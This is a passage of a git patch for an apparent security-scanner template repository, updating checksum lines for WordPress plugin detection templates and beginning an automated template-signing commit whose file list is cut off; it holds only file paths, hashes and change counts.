+http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e3e339fce79c93e20c9b6ffa87fe8ed3bed3a965 -http/technologies/wordpress/plugins/pixelyoursite.yaml:4c90a886df0853b3ec420585ad5b1627eaed3451 -http/technologies/wordpress/plugins/polylang.yaml:7e1fab5cab013b7133efce856cbb3bb1c90483d4 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:dc00224b04ce76792c7bbe084b5e1fef1caca26a -http/technologies/wordpress/plugins/post-smtp.yaml:d7eb9a788149139947f21a236702d3e2cc1dddc9 -http/technologies/wordpress/plugins/post-types-order.yaml:be3e18e75704aadb7ef64036f421dfef4c357e35 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:a282f15c76fa57dcb5f733971488021a01e0cd61 -http/technologies/wordpress/plugins/pretty-link.yaml:3aef92ac7bd70d4c871dcd25cb24238a9ad25886 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:88135c77e981ba745002ea202af781077777b7a9 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:ca07a682ed99782b12816548c50b2539a91d9f80 -http/technologies/wordpress/plugins/redirection.yaml:692660f598828f403657fe7f42f59ee0635b315f -http/technologies/wordpress/plugins/redux-framework.yaml:494a3c7d2980c728f42f580fd7c3ba19e9da1466 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:79e4d0a18e9c0fc1456a0d442871aea1326419da -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:3e3d7efdfc11245b2066313e35fac02d7b4bc58c -http/technologies/wordpress/plugins/safe-svg.yaml:c9af3e98da6e6fced100b66639edd41148c61f95 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ae241386327af47ed9354c0cf4d185900bb4eb29 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3083bc7bbb682353a7c7f853dd2910944fbc0bb4 -http/technologies/wordpress/plugins/sg-security.yaml:6a2b14ecb65fcff744ed94f3ddceb241a8c33d7c -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c5b60ac33febc684dac88b36c4b0a830db229d9c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:da3fc5ae37966c00e6a86c2d2dafa63a26471d0f -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:9619c9371868c4073837f33eb0e5c59a86fa73cb +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:84b06ad9830cfc4e06187bd4ad8283adaa064c12 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:e076ff1531af64ff3ce512d74cd688ead5344889 -http/technologies/wordpress/plugins/smart-slider-3.yaml:9846dd6a66bea01c4ec28946d09070066dcc6c66 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:8ef848eedca336018342db3b1ee59552560fcc78 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:1f8535ad38219522bb9a5a7b405a84930ef50653 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:04b1bf5ede21eb34aaac59e0222f9f4cd263021d -http/technologies/wordpress/plugins/sucuri-scanner.yaml:05690783ddb551790583ec4c5bcabaf9e786a9ce +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:aa27ccc7487bb40dbeed451dc8f6e25c6e731fff -http/technologies/wordpress/plugins/tablepress.yaml:b37a6741b7eded93048e63632ca43cd0554e4e9e -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:96d7da21306ac8e396e1b68befd7dbd83d5f5a5c -http/technologies/wordpress/plugins/templately.yaml:813bb411c8c29239dba837936b14a28f7e2169e7 -http/technologies/wordpress/plugins/the-events-calendar.yaml:70a17f9eaf634d0c19003a66633e9cdb62075921 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:fee317bab28021c61c5033bc768abdd2b74e7070 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:328ce6d4f9bc271f50cfca67930beb88ce2f9ae2 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:bca6908e0584efde21278cc77a728ff8a3fd21db -http/technologies/wordpress/plugins/under-construction-page.yaml:6741089a666de9a1d4cc26e262feb7ceccaf647c +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:d9b3126a0c750524506f4b25a6268884f697f42d +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:4cda12b6a8b41bdd55786526343d18fc59045274 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:89796302ff0e54237bddc81a25219aebea09f20c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:641826e59dd5e892d891ceba582a298502b05c7f -http/technologies/wordpress/plugins/webp-express.yaml:69484bb5b8dd0c2de6592d85ddb4ac0d6bb57051 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:270cea96bd271990a07cbe79260e1787a4cc9420 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6c0aebad65418437f8d1d0b66062e724bfcbc96c -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:b286b13f58ff4eb7f7d2eaa8bb93621f88829443 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:0b0fe9d5ac8b7d059a6709c2c25b173994d22578 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:44c2a50a94f0c653ded00895f844abc01342fa5d -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:79f624e2a40624890ea9a5d4668b17fb6b7b96c9 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:eea719d07a9885820c2c9f0cc35b780245f42668 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:7885ebfd2db3a4c52e669513fc942b751d351d3a -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:793409ed424b557d892f4b6d3bd7ac8e2618e659 -http/technologies/wordpress/plugins/woocommerce-services.yaml:b56c3be6390df503ea28be125498dbd3fe28be63 -http/technologies/wordpress/plugins/woocommerce.yaml:7f9e5aae786eb56ae01b6b7b4673bceb66d7628a -http/technologies/wordpress/plugins/wordfence.yaml:bea30c469e238d51eb0c5cf262c973b9ce9a3c55 -http/technologies/wordpress/plugins/wordpress-importer.yaml:3efeea8dac78a482ac3e0bbe24e57453d71241d6 -http/technologies/wordpress/plugins/wordpress-seo.yaml:5f438629df1d2d21a66d72b65b4d42c3b532733b +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:b1db4f5e4d7eef90ed58effeae7f9f85309a6609 -http/technologies/wordpress/plugins/wp-crontrol.yaml:2f41d46a025a0dcc5c7a6700729b27d67af837b5 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d213257ba1b453edae059ccbd7a501468ae7374e -http/technologies/wordpress/plugins/wp-file-manager.yaml:3be7a8dfb67bfccdadf08806ffed5bcd7ee2cec6 -http/technologies/wordpress/plugins/wp-google-maps.yaml:4110ffdad84e798060e6f30d2c4e97ea464913cb -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:11307c95e09135746d4a87ecdd8de317ad55b030 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:8f957a1faeccc535d5e5840b8cc67642a731cd55 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:4728ab866d2d8613418e5fe0c10d913c7312fdf2 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:4d6d314a44e3c57391b6b9a6baffbf7f861576de -http/technologies/wordpress/plugins/wp-optimize.yaml:9a281421ccaabd04273b50971ab5cb5c31e61ee6 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:76d0d699c9c04743c0acc4e52a44c0b10bafa664 -http/technologies/wordpress/plugins/wp-reset.yaml:f343a8c49dbf81192d7fafa5de3026ffef004ea5 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:58f9375cdfe89b2aee57b0f11e812ca53dd1f7f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:aa01d9b279eb66fb7078b50d8f91ab404f8564a3 -http/technologies/wordpress/plugins/wp-seopress.yaml:c7761af629c436f4fd8cd1a9cfcdf28d9adafcee -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:e6f1255dac90cd2da15fcc3a9f39f776795e97c7 -http/technologies/wordpress/plugins/wp-smushit.yaml:c4fc07327029ba73ab63e7ffcb36432698898d3f -http/technologies/wordpress/plugins/wp-statistics.yaml:ba8175558fc308d2746d9ccfe49de8d2e86a117e -http/technologies/wordpress/plugins/wp-super-cache.yaml:16266d89a475871355ff8f4b79f5db7708d4341f +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5c4cd7af661e34bde63949f75cd8edadebce425c -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:0ef95bd22194c22a2b7c278105adcb4cdc114090 -http/technologies/wordpress/plugins/wpforms-lite.yaml:dd98e7d3c48ec05034b9c297868059f320ff343a -http/technologies/wordpress/plugins/wps-hide-login.yaml:7d1da2da9ccae2e41c8a6875a7b929b2e2773909 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d49deea15d440d08d1f5dfa4a0003bba130980ce +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7d97a618b2149438008dd429704674ee4002b491 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8734,7 +8734,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:1803295ddc33a741509f1f86ce46de70c6127bce +javascript/udp/detection/tftp-detect.yaml:f3bc49f090e77c4321ea6365fadfa772af288e05 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 @@ -8917,7 +8917,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3c9efed0e605703d97a132acee7f919ce4fac105 +templates-checksum.txt:8358ddac4f74ac2bec910ddaec6056406a8367e0 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From f5973ec0106b9716b43e37959176b791ba482efb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 11:23:04 +0000 Subject: [PATCH 1593/1841] Auto Template Signing [Wed Jul 24 11:23:04 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 